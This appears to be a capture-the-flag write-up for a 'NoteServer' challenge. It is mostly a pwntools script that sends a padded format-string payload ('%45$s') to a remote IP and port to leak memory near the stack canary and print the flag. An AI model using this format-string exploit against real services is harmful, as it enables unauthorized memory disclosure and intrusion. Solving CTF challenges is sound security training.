NoteServer
Format Strings Exploit
TODO
from pwn import *
exe = ELF("./note_server")
args.LOCAL=False
args.DEBUG=False
context.binary = exe
def conn():
if args.LOCAL:
r = process([exe.path])
if args.DEBUG:
gdb.attach(r,gdbscript="""
""")
else:
r = remote("143.255.251.233", 13372)
return r
def main():
r = conn()
for i in range(0,7):
r.sendline(b'1')
r.sendline(str(i))
r.sendline(b'A'*72+b'%45$s')
r.sendline(b'3')
r.recvuntil(b'Canary value > ')
try:
a=r.recv().decode()
print('Flag..: ' +str(a))
except:
pass
r.close()
if __name__ == "__main__":
main()
Last updated